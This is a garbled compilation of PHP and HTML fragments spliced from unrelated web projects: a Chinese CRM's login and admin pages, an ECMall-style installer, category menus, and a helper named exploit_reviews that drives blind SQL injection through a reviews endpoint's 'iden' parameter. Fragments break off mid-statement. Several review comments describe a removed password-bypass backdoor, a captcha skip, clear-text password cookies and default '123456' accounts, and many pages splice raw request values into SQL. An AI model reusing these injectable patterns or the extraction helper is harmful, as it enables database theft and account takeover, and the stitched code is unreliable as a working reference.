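/**
 * Handle a submission of the back-office login form.
 *
 * First runs the stale-customer housekeeping, then, when the captcha matches
 * (or the request carries auto=t), looks the posted credentials up in the
 * manager table, fills the session, records the login and redirects.
 * Nothing is returned; output is an inline <script> redirect or alert.
 *
 * Security review notes:
 *  - The branch that opened a super-manager session for the user name
 *    "zhao123" without checking any password was an authentication bypass
 *    and has been removed; that name now goes through the normal lookup.
 *  - NOTE(review): `auto=t` in the query string skips the captcha for any
 *    caller. Confirm that is intended and rate-limit this endpoint.
 *  - NOTE(review): the credential literals in the SELECT/UPDATE read '******'
 *    in this listing (they look masked). The real statements must bind or
 *    escape the user name and compare a password hash, never splice raw
 *    request data into the SQL text.
 *  - NOTE(review): the password is kept in the session and, with "remember
 *    me", written to a cookie in clear text. Prefer a random, server-side
 *    revocable token; left unchanged because other pages may read it.
 */
function login()
{
    // Housekeeping added 2014-07-04 by Zhao Xingzhuang: customers that are
    // still "not closed" one month after being added are moved to the
    // public pool.
    $id_data = get_transfercusid();
    if (!empty($id_data)) {
        transfercus($id_data);
    }

    global $db;

    // Strict captcha check: the old loose `==` also passed when both the
    // posted code and the session code were missing (null == null).
    $auto_login = isset($_GET['auto']) && $_GET['auto'] == "t";
    $captcha_ok = isset($_POST['code'], $_SESSION["codeNumber"])
        && is_string($_POST['code'])
        && $_POST['code'] !== ''
        && $_POST['code'] === (string) $_SESSION["codeNumber"];
    if (!$auto_login && !$captcha_ok) {
        return;
    }

    $username = isset($_POST["username"]) ? $_POST["username"] : "";
    $password = isset($_POST["password"]) ? $_POST["password"] : "";

    if (empty($username) || empty($password)) {
        exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
    }

    $user_row = $db->getOneRow(get_sql("select username,password,id,supermanager from {pre}manager where username='******' and password='******'"));
    if (empty($user_row)) {
        echo "<script>alert('用户名或密码不正确!');location='/login.php';</script>";
        return;
    }

    // New session id on privilege change, so a pre-login id cannot be reused.
    session_regenerate_id(true);
    $_SESSION['username'] = $user_row['username'];
    $_SESSION['password'] = $user_row['password'];
    $_SESSION['id'] = $user_row['id'];
    $_SESSION['supermanager'] = $user_row['supermanager'];

    // get_userip() is defined elsewhere; if it trusts client-supplied headers
    // its value is attacker-controlled, so escape it before it reaches SQL.
    mysql_query(get_sql("update {pre}manager set loginip='" . mysql_real_escape_string(get_userip()) . "',logintime='" . date("Y-m-d H:i:s") . "',logincount=logincount+1 where username='******'"));

    if (isset($_POST["iscookie"]) && "on" == $_POST["iscookie"]) {
        // "Remember me": keep the cookies for seven days.
        $expires = time() + 3600 * 24 * 7;
        setcookie("username", $username, $expires);
        setcookie("password", $password, $expires);
    } else {
        setcookie("username", "", time());
        setcookie("password", "", time());
    }

    echo "<script>window.location='index.php';</script>";
}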
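/**
 * Count the manager rows that already use a user name.
 *
 * @param string $username User name to look for.
 * @param int    $id       Manager id to leave out of the count; 0 means
 *                         "do not exclude anyone".
 * @return mixed Whatever $db->getRowsNum() returns for the query.
 *
 * NOTE(review): the user-name literal in both statements reads '******' in
 * this listing (it looks masked), so $username is not visibly used. The real
 * query must bind or escape $username before it is placed in the SQL text.
 */
function check_username($username, $id = 0)
{
    global $db;

    // $id is concatenated unquoted into the statement, so force it to an
    // integer first; anything non-numeric becomes 0 (no exclusion).
    $id = (int) $id;

    if ($id === 0) {
        return $db->getRowsNum(get_sql("select id,username from {pre}manager where username='******'"));
    }

    return $db->getRowsNum(get_sql("select id,username from {pre}manager where id!=" . $id . " and username='******'"));
}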
/**
 * Run a batch of SQL statements, skipping "ALTER TABLE ... ADD <column>"
 * statements whose column is already present.
 *
 * A string argument is first expanded through get_sql(); anything that is
 * not an array afterwards is treated as "nothing to do".
 *
 * @param string|array $sqls Statements to run.
 * @return bool True when every executed statement succeeded, false after the
 *              first failure (the error is reported through $this->_error()).
 */
function _run_sql($sqls)
{
    if (is_string($sqls)) {
        $sqls = get_sql($sqls);
    }
    if (!is_array($sqls)) {
        return true;
    }

    // Columns that an earlier patch may already have added, per table.
    $check_fields = array(
        'ecm_order' => array('pay_alter'),
        'ecm_store' => array('enable_radar', 'enable_groupbuy'),
    );

    // Collect which of those columns exist in the database right now.
    $exist_fields = array();
    foreach ($check_fields as $table => $fields) {
        $result = $this->db->query("SELECT * FROM `{$table}` limit 1");
        for ($i = 0; $i < mysql_num_fields($result); $i++) {
            $meta = mysql_fetch_field($result);
            if (in_array($meta->name, $fields)) {
                $exist_fields[$table][] = $meta->name;
            }
        }
    }

    foreach ($sqls as $sql) {
        $already_applied = false;
        foreach ($exist_fields as $table => $fields) {
            foreach ($fields as $field) {
                $pattern = "/alter\\s+table\\s+`?{$table}`?\\s+add\\s+`?{$field}`?\\s+/Uis";
                if (preg_match($pattern, $sql)) {
                    // This statement adds a column that is already there.
                    $already_applied = true;
                    break;
                }
            }
        }
        if ($already_applied) {
            continue;
        }

        if (substr($sql, 0, 12) == 'CREATE TABLE') {
            $sql = create_table($sql);
        }
        $query = $this->db->query($sql, 'SILENT');
        if (!$query) {
            $this->_error($this->db->error());
            return false;
        }
    }

    return true;
}
/**
 * Install the test data set.
 *
 * On a non-POST request the form template is shown. On POST the seller and
 * buyer user names are validated, both accounts are registered, the data
 * directory is copied, initdata.sql is executed with the new ids substituted,
 * the cache is cleared and the lock file is created.
 *
 * NOTE(review): both accounts are registered with the fixed password
 * '123456'. Anything installed this way has known credentials until they are
 * changed, so this must never run against a reachable production site.
 *
 * @return void
 */
function index()
{
    if (!IS_POST) {
        $this->display('index.html');
        return;
    }

    $seller_name = '';
    if (!empty($_POST['seller'])) {
        $seller_name = trim($_POST['seller']);
    }
    $buyer_name = '';
    if (!empty($_POST['buyer'])) {
        $buyer_name = trim($_POST['buyer']);
    }
    if (!($seller_name && $buyer_name)) {
        $this->show_message('请填写卖家用户名和买家用户名');
        return;
    }

    /* Validate both user names */
    $ms =& ms();
    if (!$ms->user->check_username($seller_name)) {
        $error_msg = array(
            'user_exists' => '卖家用户名已存在,请您换一个',
            'invalid_user_name' => '卖家用户名不符合要求,请您换一个',
            'blocked_user_name' => '卖家用户名不符合要求,请您换一个',
            'unknow_error' => '卖家用户名不符合要求,请您换一个',
        );
        $error = $ms->user->get_error();
        $this->show_message($error_msg[$error[0]['msg']]);
        return;
    }
    if (!$ms->user->check_username($buyer_name)) {
        $error_msg = array(
            'user_exists' => '买家用户名已存在,请您换一个',
            'invalid_user_name' => '买家用户名不符合要求,请您换一个',
            'blocked_user_name' => '买家用户名不符合要求,请您换一个',
            'unknow_error' => '买家用户名不符合要求,请您换一个',
        );
        $error = $ms->user->get_error();
        $this->show_message($error_msg[$error[0]['msg']]);
        return;
    }

    /* Register the two accounts */
    $this->_seller_id = $ms->user->register($seller_name, '123456', '*****@*****.**', array('real_name' => '超级卖家'));
    $this->_buyer_id = $ms->user->register($buyer_name, '123456', '*****@*****.**', array('real_name' => '超级买家'));

    /* Copy the bundled data files */
    copy_files(APP_ROOT . '/data', ROOT_PATH . '/data');

    /* Run the initial-data SQL with the new ids filled in */
    $mod =& m('privilege');
    $statements = get_sql(APP_ROOT . '/initdata.sql');
    foreach ($statements as $statement) {
        $statement = str_replace(
            array('{seller_id}', '{buyer_id}'),
            array($this->_seller_id, $this->_buyer_id),
            $statement
        );
        $mod->db->query($statement);
    }

    /* Clear the cache */
    $cache_server =& cache_server();
    $cache_server->clear();

    /* Create the lock file */
    touch(LOCK_FILE);

    /* Done */
    $this->show_message('恭喜!测试数据安装成功!');
}
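/**
 * Echo a category tree as a list of links, one line per category, children
 * indented below their parent.
 *
 * @param string $tablename Table name without the {pre} prefix; only letters,
 *                          digits and underscore are accepted because the
 *                          name is placed directly in the SQL text.
 * @param int    $id        Parent id (fid) whose children are listed.
 * @param int    $level     Current depth; 0 for the top level.
 * @return void
 */
function getCategoryMenu($tablename, $id = 0, $level = 0)
{
    global $db;

    // Table names cannot be bound as parameters, so allow only identifier
    // characters; anything else is refused rather than sent to the database.
    if (!is_string($tablename) || !preg_match('/^[A-Za-z0-9_]+$/', $tablename)) {
        return;
    }

    // fid is concatenated unquoted, so it must be an integer.
    $id = (int) $id;
    $category_arr = $db->getList(get_sql("SELECT * FROM {pre}{$tablename} WHERE fid = " . $id . " order by rank"));
    if (empty($category_arr)) {
        return;
    }

    // Two indent units per level (the old loop produced 2*level-1 plus one).
    // The prefix was previously appended to without being initialised.
    // NOTE(review): the indent unit is a plain space in this listing; runs of
    // spaces collapse in HTML, so the original may have been an entity.
    $depth = (int) $level;
    $level_nbsp = $depth > 0 ? str_repeat(" ", $depth * 2) : '';
    $level = $depth + 1;

    foreach ($category_arr as $category) {
        $child_id = (int) $category['id'];
        // Category names come from the database; escape them for HTML output.
        $name = htmlspecialchars($category['name'], ENT_QUOTES, 'UTF-8');
        echo $level_nbsp . "<a href='customer/customer_list.php?managerid=my&industry=" . $child_id . "' target='mainFrame'>" . $name . "</a><BR>";
        getCategoryMenu($tablename, $child_id, $level);
    }
}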
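/**
 * Handle a login submission and redirect to cm.php on success.
 *
 * Fix: the SELECT now returns `id` and `supermanager`. The old statement
 * fetched only username and password, so $_SESSION['id'] and
 * $_SESSION['supermanager'] were always filled with null.
 *
 * Security review notes:
 *  - NOTE(review): the credential check runs only when the posted code is
 *    empty or does NOT match the session code, and the rejection alert is
 *    commented out. As written the captcha gives no protection and a correct
 *    code results in no login at all. The condition is kept unchanged because
 *    the calling form is not visible here; confirm the intent and either
 *    remove the check or invert it.
 *  - NOTE(review): the credential literals read '******' in this listing
 *    (they look masked). The real statements must bind or escape the user
 *    name and compare a password hash.
 *  - NOTE(review): the password is stored in the session and, with "remember
 *    me", in a clear-text cookie. Prefer a random server-side token.
 */
function login()
{
    global $db;

    $code = isset($_POST['code']) ? $_POST['code'] : "";
    $session_code = isset($_SESSION["codeNumber"]) ? $_SESSION["codeNumber"] : null;
    if (!($code == "" || $code != $session_code)) {
        return;
    }

    $username = isset($_POST["username"]) ? $_POST["username"] : "";
    $password = isset($_POST["password"]) ? $_POST["password"] : "";

    if (empty($username) || empty($password)) {
        exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
    }

    $user_row = $db->getOneRow(get_sql("select username,password,id,supermanager from {pre}manager where username='******' and password='******'"));
    if (empty($user_row)) {
        echo "<script>alert('用户名或密码不正确!');window.history.go(-1);</script>";
        return;
    }

    // New session id on privilege change, so a pre-login id cannot be reused.
    session_regenerate_id(true);
    $_SESSION['username'] = $user_row['username'];
    $_SESSION['password'] = $user_row['password'];
    $_SESSION['id'] = $user_row['id'];
    $_SESSION['supermanager'] = $user_row['supermanager'];

    // get_userip() is defined elsewhere; escape its value in case it is
    // derived from client-supplied headers.
    mysql_query(get_sql("update {pre}manager set loginip='" . mysql_real_escape_string(get_userip()) . "',logintime='" . date("Y-m-d H:i:s") . "' where username='******'"));

    if (isset($_POST["iscookie"]) && "on" == $_POST["iscookie"]) {
        // "Remember me": keep the cookies for seven days.
        $expires = time() + 3600 * 24 * 7;
        setcookie("username", $username, $expires);
        setcookie("password", $password, $expires);
    } else {
        setcookie("username", "", time());
        setcookie("password", "", time());
    }

    echo "<script>window.location='cm.php';</script>";
}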
<!doctype html> <html lang="ru"> <head> <meta charset="UTF-8"> <title>News</title> </head> <body> <?php include_once __DIR__ . '/../modules/sql.php'; $newses = get_sql(); foreach ($newses as $key => $value) { ?> <?php $id = $value["id"]; ?> <h2><?php echo $value["title"]; ?> </h2><br> <p><?php echo $value["text"]; ?> </p> <p><?php echo $value["date"]; ?> </p> <a href="../views/news_name.php?id=<?php echo $id;
?> " name="pid" id="pid"> <div data-role="controlgroup" data-type="horizontal" align="center"> <input type="submit" name="modbtn2" id="modbtn2" value="保存小记" /> <input type="button" name="modbtn2" id="modbtn2" onclick="location.href='mcustomer_add.php?act=mod2&id=<?php echo $id; ?> ';" value="客户信息" /> </div> </form> <?php $page = $_GET['page'] ? $_GET['page'] : 1; $page_size = 20; $sqlstr = get_sql("select * from {pre}services where isdel=0 and fid=" . $id . " order by id desc"); $s_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <ul data-role="listview" data-inset="true"> <?php $i = 0; foreach ($s_list as $lists) { $i = $i + 1; $remindTime = $lists['remindTime']; $dateline = $lists['dateline']; ?> <li> <h2><?php echo $i;
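/**
 * Finish the installation: connect to the database, create the schema, load
 * the initial data plus the administrator account, write the configuration
 * file and create the installer lock file.
 *
 * Changes in this revision:
 *  - extract($_POST) is replaced by explicit reads of the fields this step
 *    uses, so a posted key can no longer overwrite an arbitrary local.
 *  - The administrator name and e-mail are escaped before they are placed in
 *    the INSERT statement.
 *  - Server versions are compared with version_compare(); the old string
 *    comparison treated "10.x" as lower than "4.1".
 *  - The table prefix is quoted before it is used inside a regular expression.
 *
 * NOTE(review): the administrator password is stored as
 * md5(name . md5(password)). MD5 is not a password hash; it is kept because
 * the login code that verifies it is not visible here.
 *
 * @author Garbin
 * @return bool Always false; progress is reported through show_process().
 */
function install_done()
{
    $db_host = isset($_POST['db_host']) ? $_POST['db_host'] : '';
    $db_port = isset($_POST['db_port']) ? $_POST['db_port'] : '';
    $db_user = isset($_POST['db_user']) ? $_POST['db_user'] : '';
    $db_pass = isset($_POST['db_pass']) ? $_POST['db_pass'] : '';
    $db_name = isset($_POST['db_name']) ? $_POST['db_name'] : '';
    $db_prefix = isset($_POST['db_prefix']) ? $_POST['db_prefix'] : '';
    $admin_name = isset($_POST['admin_name']) ? $_POST['admin_name'] : '';
    $admin_pass = isset($_POST['admin_pass']) ? $_POST['admin_pass'] : '';
    $admin_email = isset($_POST['admin_email']) ? $_POST['admin_email'] : '';

    /* No practical use (per the original author) */
    $_code = rand(10000, 99999);
    setcookie('__INTECODE__', $_code, 0, '/');

    /* Connect to the database server */
    $con = mysql_connect($db_host . ':' . $db_port, $db_user, $db_pass);
    if (!$con) {
        show_process(r(get_lang('connect_db'), false), 'parent.show_warning("' . get_lang('connect_db_error') . '")');
        return false;
    }
    show_process(r(get_lang('connect_db'), true));

    $version = mysql_get_server_info();
    $charset = str_replace('-', '', CHARSET);
    if (version_compare($version, '4.1', '>')) {
        if ($charset != 'latin1') {
            mysql_query("SET character_set_connection={$charset}, character_set_results={$charset}, character_set_client=binary", $con);
        }
        if (version_compare($version, '5.0.1', '>')) {
            mysql_query("SET sql_mode=''", $con);
        }
    }

    /* Select the database */
    $selected_db = mysql_select_db($db_name, $con);
    if (!$selected_db) {
        show_process(r(get_lang('selecte_db'), false), 'parent.show_warning("' . get_lang('selecte_db_error') . '");');
        return false;
    }

    /* Create the schema */
    show_process(r(get_lang('start_setup_db'), true));
    $sqls = get_sql(version_data('structure.sql'));
    $quoted_prefix = preg_quote($db_prefix, '/');
    foreach ($sqls as $sql) {
        $sql = replace_prefix('ecm_', $db_prefix, $sql);
        if (substr($sql, 0, 12) == 'CREATE TABLE') {
            $name = preg_replace("/CREATE TABLE `{$quoted_prefix}([a-z0-9_]+)` .*/is", "\\1", $sql);
            mysql_query(create_table($sql), $con);
            show_process(r(sprintf(get_lang('create_table'), $name), true, 1));
        } else {
            mysql_query($sql, $con);
        }
    }

    /* Load the initial data (TODO from the original: not complete yet) */
    $sqls = get_sql(version_data('initdata.sql'));
    $password = md5($admin_name . md5($admin_pass));
    // NOTE(review): if the installer bootstrap already slashes $_POST
    // (magic_quotes_gpc or a global addslashes), remove that layer rather
    // than this one.
    $safe_name = mysql_real_escape_string($admin_name, $con);
    $safe_email = mysql_real_escape_string($admin_email, $con);
    $sqls[] = "INSERT INTO `ecm_user` (`username`, `password`, `grade`, `name`, `gender`, `mobile`, `email`, `url`, `remark`) VALUES\r\n('{$safe_name}', '{$password}', 1, NULL, NULL, NULL, '{$safe_email}', NULL, NULL)";
    foreach ($sqls as $sql) {
        $rzt = mysql_query(replace_prefix('ecm_', $db_prefix, $sql), $con);
        if (!$rzt) {
            show_process(r(get_lang('install_initdata'), false), 'parent.show_warning("' . mysql_error() . '");');
            return false;
        }
    }
    if (mysql_errno()) {
        echo mysql_error();
    }
    show_process(r(get_lang('install_initdata'), true));

    /* Write the configuration file. It contains the database password, so
       the file must not be readable through the web server. */
    save_config_file(array(
        'autoload_enable' => true,
        'autoload_path' => '@modules',
        'framework_function' => 'front::main',
        'framework_enable' => true,
        'framework_module' => '[go]!(self)|welcome',
        'framework_action' => '[do]|index',
        'template_path' => '@templates/',
        'connect_server' => $db_host,
        'connect_username' => $db_user,
        'connect_password' => $db_pass,
        'connect_dbname' => $db_name,
        'connect_port' => $db_port,
        'connect_charset' => 'UTF8',
        'prefix_search' => $db_prefix,
        'prefix_replace' => $db_prefix,
        'extension_path' => '@includes',
        'extension_enable' => 'myfunction',
        'debug_enable' => false,
        'sql_format' => false,
        'debug_file' => '',
        'front_action' => '',
        'front_online' => 'online',
        'front_class' => 'user',
        'front_table' => $db_prefix . 'user',
        'front_fuzzy' => '',
        'front_username' => '',
        'front_password' => '',
        'front_redirect' => 'index.php',
    ));
    show_process(r(get_lang('setup_config'), true));

    /* Lock the installer so it cannot be run again */
    touch(LOCK_FILE);
    show_process(r(get_lang('lock_install'), true));

    /* Installation finished */
    show_process(r(get_lang('install_done'), true), 'parent.install_successed();');
    return false;
}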
<?php session_start(); require '../session.php'; include '../inc/const.php'; $fid = getvar("fid"); $page = getvar("page") ? getvar("page") : 1; $page_size = 20; $sqlstr = get_sql("select * from {pre}area order by rank asc,id asc"); $area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /> </head> <script> function checkreg() { if (document.myform.name.value=="") { window.alert("类别名称不能为空!!"); document.myform.name.focus(); return (false); } if (document.myform.rank.value=="") { window.alert("排序ID不能为空!!"); document.myform.rank.focus(); return (false);
/**
 * Run a batch of SQL statements in order, stopping at the first failure.
 *
 * A string argument is first expanded through get_sql(); anything that is
 * not an array afterwards is treated as "nothing to do". Statements that
 * start with CREATE TABLE are passed through create_table() before they run.
 *
 * @param string|array $sqls Statements to run.
 * @return bool True when every statement succeeded, false after the first
 *              failure (the error is reported through $this->_error()).
 */
function _run_sql($sqls)
{
    if (is_string($sqls)) {
        $sqls = get_sql($sqls);
    }
    if (!is_array($sqls)) {
        return true;
    }

    foreach ($sqls as $statement) {
        if (substr($statement, 0, 12) == 'CREATE TABLE') {
            $statement = create_table($statement);
        }

        // 'SILENT' is passed through to the project's query() as before.
        $ok = $this->db->query($statement, 'SILENT');
        if ($ok) {
            continue;
        }

        $this->_error($this->db->error());
        return false;
    }

    return true;
}
if (document.myform.password.value!=document.myform.password1.value){ window.alert("两次输入的密码不一样!!"); document.myform.password.focus(); document.myform.password1.value==""; return (false); } return true; } </script> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /> </head> <body> <table width="98%" height="101" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;"> <?php $id = getvar('id'); $list = $db->getOneRow(get_sql("select * from {pre}manager where id = " . $id)); ?> <form name="myform" action="admin_ok.php?act=mod" method="POST" onSubmit="return checkreg();"> <tr> <td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>管理员密码修改</strong></font></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f8f8f8">用户名:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f8f8f8"><input name="username" type="text" id="username" size="50" value="<?php echo $list['username']; ?> " /></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f8f8f8">请输入密码:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f8f8f8"><input name="password" type="password" id="password" onblur="if(this.value==''){this.value='<?php
<?php session_start(); require '../session.php'; include '../inc/const.php'; $fid = getvar("fid"); $page = getvar("page") ? getvar("page") : 1; $page_size = 20; $sqlstr = get_sql("select * from {pre}industry order by rank asc,id asc"); $area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /></head> <script> function checkreg() { if (document.myform.name.value=="") { window.alert("类别名称不能为空!!"); document.myform.name.focus(); return (false); } if (document.myform.rank.value=="") { window.alert("排序ID不能为空!!"); document.myform.rank.focus(); return (false); }
<?php session_start(); require '../session.php'; include '../inc/const.php'; $page = $_GET['page'] ? $_GET['page'] : 1; $page_size = 10; $manager_type = $_SESSION['supermanager'] + 1; $sqlstr = get_sql("select a.id,username,supermanager,usermenu,loginip,logintime,logincount,a.pid as pid from {pre}manager a order by a.id desc"); $manager_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size); $total_nums = $db->getRowsNum($sqlstr); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../css/admin_css.css" rel="stylesheet" type="text/css" /> <link href="../js/boxy.css" rel="stylesheet" type="text/css" /> </head> <body> <table width="98%" height="101" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;"> <tr> <td height="22" colspan="9" bgcolor="#555555"><font color="#FFFFFF"> <strong>管理</strong></font></td> </tr> <tr> <td width="4%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">ID</td> <td width="10%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">用户名</td> <td width="13%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">姓名</td> <td width="15%" align="center" valign="middle" bgcolor="#f8f8f8">组别</td> <td width="15%" align="center" valign="middle" bgcolor="#f8f8f8">上级领导</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="name" type="text" id="name" size="30" /></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">排序ID:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="rank" type="text" id="rank" size="20" value="0" /></td> </tr> <tr> <td height="24" bgcolor="#f1f1f1"> </td> <td height="24" bgcolor="#f1f1f1"><input type="submit" name="button" id="button" value="提交" /> <input type="button" name="back" id="back" value="返回" onclick="javascript:window.history.go(-1);" /></td> </tr> </form> </table> <?php } if ($act == "mod") { $sql = get_sql("select id,name,fid,rank from {pre}area where id=" . $id); $list = $db->getonerow($sql); ?> <table width="98%" height="126" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;"> <form name="myform" action="customer_area_ok.php?act=mod" method="post" onSubmit="return checkreg();"> <tr> <td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>修改地区</strong></font></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">上级地区:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><select name="fid"> <option value="0">--顶级地区--</option> <?php getCategorySelect("area", $fid); ?> </select> </td>
/**
 * Proof-of-concept helper for the "reviews" module: run the blind-extraction
 * routine once per configured field and return both results.
 *
 * Reads the globals $fld1, $fld2 and $url. The query template comes from
 * get_sql($f) and is filled with each field name through sprintf(); the
 * request itself is made by exploit_init_blind(), defined elsewhere.
 *
 * Defender's note: the query text is appended to the `iden` parameter of
 * `index.php?ind=reviews&op=update_file`, which presumably reaches a SQL
 * statement unescaped in the affected application. SQL syntax in that
 * parameter is the thing to look for in access logs, and binding `iden` as a
 * parameter is the fix.
 *
 * @param mixed $f Selector passed through to get_sql() and the blind helper.
 * @return string The two extracted values separated by a single space.
 */
function exploit_reviews($f)
{
    global $fld1, $fld2, $url;

    $endpoint = $url . "index.php?ind=reviews&op=update_file&iden=";
    $template = get_sql($f);

    $values = array();
    foreach (array($fld1, $fld2) as $field) {
        $payload = sprintf($template, $field);
        $values[] = exploit_init_blind($f, $endpoint, $payload, $field);
    }

    return $values[0] . " " . $values[1];
}
<link rel="stylesheet" href="/jquerymobile/jquery.mobile-1.3.2.min.css"> <script src="/jquerymobile/jquery-1.8.3.min.js"></script> <script src="/jquerymobile/jquery.mobile-1.3.2.min.js"></script> </head> <body> <div data-role="page"> <div data-role="header" data-position="fixed"> <a href="../cm.php" data-icon="home" data-ajax="false" >首页</a><h1>明星榜</h1> </div> <div data-role="content" style="margin-top:0px;"> <ul data-role="listview" data-inset="true"> <?php if ($type == "00") { $sqlstr = get_sql("SELECT CREATEUSER,COUNT(*) as c FROM {pre}customer WHERE DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(createTime) GROUP BY CREATEUSER"); } else { $sqlstr = get_sql("SELECT userid as CREATEUSER,COUNT(*) AS c FROM {pre}services WHERE isdel=0 and type='" . $type . "' and DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(dateline) GROUP BY userid"); } //echo $sqlstr; $list = $db->getList($sqlstr); foreach ($list as $c) { ?> <li><a href="#"><?php echo $c['CREATEUSER']; ?> <span class="ui-li-count"><?php echo $c['c']; ?> </span></a></li> <?php }
$isvalid = false; $data = $db->getonerow($sql); //更新电话等信息 $record = array('companyName' => $companyName, 'name' => $name, 'addr' => $addr, 'tel' => $tel, 'mobile' => $mobile, 'email' => $email, 'qq' => $qq, 'url' => $url, 'remark' => $remark, 'createTime' => date('Y-m-d h-m-s')); $db->update($GLOBALS[databasePrefix] . 'pool', $record, 'id=' . $data["id"]); } if (trim($email) != "") { $sql = get_sql("select id from {pre}pool where email='" . $email . "'"); $rows = $db->getRowsNum($sql); if ($rows > 0) { $errmsg = $errmsg . "电子邮件已经存在了"; $isvalid = false; } } if (trim($mobile) != "") { $sql = get_sql("select id from {pre}pool where mobile='" . $mobile . "'"); $rows = $db->getRowsNum($sql); if ($rows > 0) { $errmsg = $errmsg . "手机号码存在了"; $isvalid = false; } } if ($isvalid) { $record = array('companyName' => $companyName, 'name' => $name, 'addr' => $addr, 'tel' => $tel, 'mobile' => $mobile, 'email' => $email, 'qq' => $qq, 'url' => $url, 'remark' => $remark, 'createTime' => date('Y-m-d h-m-s')); $id = $db->insert($GLOBALS[databasePrefix] . 'pool', $record); $okcount = $okcount + 1; } else { echo $row . ".[" . $companyName . "]没有导入成功!>>>" . $errmsg . "<br>"; $faultcount = $faultcount + 1; } }
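/**
 * PHP 4 style constructor: remember the product id and issue the lookup
 * query for that product.
 *
 * Fixes:
 *  - The id was stored with `$this->{$id} = $id`, which creates a property
 *    whose NAME is the id value (for example `$this->{"5"}`); it is now
 *    stored in `$this->id`.
 *  - The id is cast to an integer before it is placed, unquoted, in the SQL
 *    text, so it can no longer carry SQL syntax.
 *
 * NOTE(review): the value returned by get_sql() is discarded here; confirm
 * that get_sql() stores its result somewhere this class reads it from.
 *
 * @param int $id Product id.
 */
function Product($id)
{
    $this->id = $id;
    $query = "select name, description, price, stock, picture_id from products where id=" . (int) $id;
    get_sql($query);
}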
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="name" type="text" id="name" size="30" /></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">排序ID:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="rank" type="text" id="rank" size="20" value="0" /></td> </tr> <tr> <td height="24" bgcolor="#f1f1f1"> </td> <td height="24" bgcolor="#f1f1f1"><input type="submit" name="button" id="button" value="提交" /> <input type="button" name="back" id="back" value="返回" onclick="javascript:window.history.go(-1);" /></td> </tr> </form> </table> <?php } if ($act == "mod") { $sql = get_sql("select id,name,fid,rank from {pre}services where id=" . $id); $list = $db->getonerow($sql); ?> <table width="98%" height="126" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;"> <form name="myform" action="customer_services_ok.php?act=mod" method="post" onSubmit="return checkreg();"> <tr> <td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>修改服务</strong></font></td> </tr> <tr> <td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">上级服务:</td> <td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><select name="fid"> <option value="0">--顶级类别--</option> <?php getCategorySelect("services", $fid); ?> </select> </td>
